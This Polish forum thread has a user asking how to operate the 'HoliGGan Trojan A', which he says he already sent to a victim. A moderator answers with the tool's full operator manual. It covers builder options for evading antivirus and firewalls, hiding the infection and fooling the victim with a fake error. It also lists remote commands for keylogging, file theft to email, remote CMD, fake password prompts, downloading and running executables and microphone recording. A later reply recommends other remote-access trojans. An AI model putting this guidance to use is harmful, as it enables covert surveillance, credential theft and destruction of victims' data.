Problem z HoliGGan Trojan A

pittterr33111

Użytkownik
Dołączył
Październik 16, 2013
Posty
2
Witam,niedawno pobrałem program HoliGGan Trojan A.Postępowałem według instrukcji,która znajdowała się na stronie twórcy tego trojana,wygenerowałem server,przesłałem plik ofiarze,ale zupełnie nie wiem gdzie mam wpisywać komendy,podane przez autora.Dodam,że zaznaczyłem tam funkcje keyloggera i logi nie przychodzą na e-mail podany przy konfiguracji.Prosiłbym o pomoc i z góry dziękuje za odpowiedź.
Trojana pobierałem z tej strony : www.astrx.neth.pl
 

Dark Smark

Były Moderator
Dołączył
Kwiecień 29, 2006
Posty
1953
HoliGGan Trojan A (do pobrania w dziale Download) - jest koniem trojańskim (pierwsza moja produkcja) działającym za NAT`em (uwaga: nie jest oparty na komponencie THGG jak ktoś mógłby wywnioskować z nazwy). Do komunikacji używa protokołu gadu-gadu. Do komunikacji z serverem jako klienta używamy zwykłego komunikatora gg. Program potrafi zabić kilka rodzajów firewalli i kilka programów typu antispyware, ma wbudowany keylogger, umożliwia pełny dostęp do dysków ofiary i wiele innych funkcji opisanych poniżej.
Na dzień 11maja2006 trojan jest niewykrywalny przez większość programów antywirusowych.
Konfiguracja:
Zakładka gg connect:
*server gg number - numer nowo utworzonego konta gg
*server gg password - hasło nowo utworzonego konta gg
*client gg number - twój numer gg
Zakładka e-mail
*server mail SMTP - SMTP nowo utworzonego konta pocztowego
*server mail address - adres nowo utworzonego konta pocztowego
*server mail password - hasło nowo utworzonego konta pocztowego
*client mail address - adres twojego konta pocztowego
Zakładka killer
zaznaczamy które procesy mają być zabite i blokowane przed uruchomieniem (ilość wybranych pozycji może ujemnie wpływać na pracę servera)
Zakładka GENERATE (przykład poprawnego ustawienia)
ustawiamy opcje instalacji i generujemy server trojana do przesłania ofierze:
*load icon - wybieramy ikonę dla pliku servera
*UPX compress - pakuje server trojana
*add to SP2 firewall rules - dodaje server trojana do wyjątków SP2 firewalla u ofiary
*block TaskManager - wyłącza Manager Zadań
*keylogger on startup - aktywuje keylogger przy starcie servera
*send logs (30 min.) - automatyczne wysyłanie logów keyloggera
*hide in registry - chowa wpis w rejestrze (niewidzialny przez HijackThisa)
*show Error during install - dla zmylenia ofiary pokazuje błąd po otwarciu pliku servera
*install patch - ścieżka gdzie ma się zainstalować trojan, możemy sami ręcznie wpisać lub wybrać jedną z pozycji, np. X:\WINDOWS wtedy trojan wyszuka na którym dysku jest zainstalowany Windows i tam się zainstaluje
*install file name - nazwa pod jaką zainstaluje się server u ofiary (koniecznie z rozszerzeniem exe)
*install description - opis pliku który zainstaluje się u ofiary (bez spacji !!!)
*server file name - nazwa pliku który chcemy podesłać ofierze (koniecznie z rozszerzeniem exe)
*GENERATE server - wygenerowanie servera trojana do przesłania ofierze

Komendy:
/info - info o wersji trojana
/victiminfo - przesyła info o ofierze (nazwa kompa, user, rodzaj systemu, IP, rozdzielczosc, serial key Windowsa, od jakiego czasu ofiara ma włączonego kompa)
/del - bezpowrotne skasowanie pliku (np. /del c:\fotka.jpg)
/deltree - bezpowrotne skasowanie katalogu (np. /deltree c:\FOTKI)
/run - uruchomienie danego procesu na kompie ofiary (np. /run c:\flashget\flashget.exe)
/hdd - info o wszystkich dyskach i napędach ofiary
/process - wyświetla wszystkie procesy z kompa ofiary
/dir - przeglądnięcie danego katalogu (np. /dir c:\Zbyszek\Fotki)
/kill - zabicie działającego procesu na kompie ofiary (np. /kill emule.exe)
/search - szukanie pliku na kompie ofiary (np. /search *.jpg)
/mail - wysłanie pojedynczego pliku z kompa ofiary na maila (np. /mail c:\Zbyszek\Fotki\fotka.jpg)
/keyloggeron - zdalne włączenie keyloggera u ofiary (jeśli nie został aktywowany przy konfiguracji servera)
/keyloggeroff - zdalne wyłączenie keyloggera
/sendlog - przesłanie logów keyloggera z kompa ofiary
/cmd - dostęp do CMD ofiary, po tej komendzie wysyłamy tylko standartowe komendy cmd (dir, cd itp.). Jeśli chcemy wyjść z CMD wpisujemy exit lub /cmdoff. Od tego momentu możemy znów wysyłać komendy trojana.
/cd - wysuwa tackę CD
/voice - wypowiada tekst u ofiary (np. /voice jak sie masz)
/rotate - odwraca pulpit do góry nogami
/negative - negatyw pulpitu
/outlook - importuje z Outlooka: nazwę, adres e-mail, tel.domowy, tel.komórkowy i nam wysyła na gg
/banner - wyświetla banner z takstem (np. /banner jak się masz)
/hideicons - chowa ikony na pulpicie
/showicons - pokazuje ikony na pulpicie
/print - drukuje ofierze wybrany przez nas dokument (np. /print c:\Zbyszek\CV.doc)
/hidetray - ukrywa pasek
/monitoroff - wyłącza ofierze monitor
/monitoron - włącza monitor
/wardate - zmienia datę w kompie ofiary na 1września1939
/hideclock - chowa ofierze zegar
/showclock - pokazuje wcześniej ukryty zegar
/uploadexe - pobiera z internetu plik exe i zapisuje w c:\hool.exe, adres strony podajemy bez "www." (np. uploadexe portal/downloads/przykład.exe)
/uploadjpg - pobiera z internetu plik jpg i zapisuje w c:\hool.jpg, adres strony podajemy bez "www." (np. uploadjpg portal/downloads/przykład.jpg)
/uploadbmp - pobiera z internetu plik bmp i zapisuje w c:\hool.bmp, adres strony podajemy bez "www." (np. uploadbmp portal/downloads/przykład.bmp)
/drawdesktop - rysuje na pulpicie wybraną bitmapę (np. /drawdesktop c:\Zbyszek\rysunek.bmp)
/screen - wysyła na nasze gg screen z komputera ofiary
/view lub /viewjpg - wysyła na gg podgląd obrazka jpg (np. /view c:\Zbyszek\obrazek.jpg)
/playmedia - odgrywa na kompie ofiary pliki avi, mp3, wav (np. /playmedia c:\Zbyszek\Muzyka\discopolo.mp3) ;)
/stopmedia - zatrzymuje odgrywanie
/wallpapper - ustawia tapetę u ofiary, tylko pliki bmp (np. /wallpapper c:\Zbyszek\rysunek.bmp)
/clipboard - wysyła nam na gg tekst ze schowka ofiary
/askforgg - u ofiary wyskakuje fałszywe okno gg proszące o podanie numeru gg i hasła po czym przesyła nam te dane na nasze gg
/askformail - jak wyżej tylko z mailem
/iestartpage - ustawienie strony startowej IE u ofiary (np./iestartpage www.haker.com.pl)
/internetpage - otwiera stronę w domyślnej przeglądarce (np./internetpage www.haker.com.pl)
/disabletaskmgr - wyłącza Menedżera zadań u ofiary (stosujemy jeśli nie zrobiliśmy tej opcji w konfiguracji servera)
/enabletaskmgr - włącza Menedżera zadań u ofiary
/disconnect - rozłącza połączenie z serverem do następnego startu kompa ofiary
/uninstall - odinstalowanie trojana z kompa ofiary (po restarcie)
(dodatkowe komendy w wersji VIP:)
/upload - pobiera z internetu jakikolwiek plik i zapisuje w c:\
/crazymouseon - włącza szaloną myszkę ;)
/crazymouseoff - wyłączenie
/freezedesktop - zamraża pulpit
/unfreezedesktop - odmraża pulpit
/disturbances - graficzne zakłócenia na kompie ofiary
/microphonerec - rozpoczęcie nagrywania mikrofonu
/microphonestop - zatrzymanie nagrywania mikrofonu i zapisanie nagrania w C:\microphone.wav
/matrix - graficzny efekt matrix
/matrixoff - wyłączenie efektu matrix
/chat - czat z ofiarą

HooliGGan Trojan na forach:
UnitedCrew Forum
haker.com.pl Forum
Źródło: http://www.astrx.neth.pl
 

pittterr33111

Użytkownik
Dołączył
Październik 16, 2013
Posty
2
Również czytałem informacje podane na tej stronie,lecz nadal nie mogę wywnioskować jak mam wysyłać komendy do servera?.W pliku nie był dołączony klient.
 

DanoPlurana

Użytkownik
Dołączył
Marzec 16, 2007
Posty
246
Daruj sobie trojana z 2006 roku ... uzyj czegos co jest cały czas aktualizowane: CyberGate/Blackshades/Darkcomet/SpyNet/JRat dużo tego jest ...

Pzdr
 
Do góry Bottom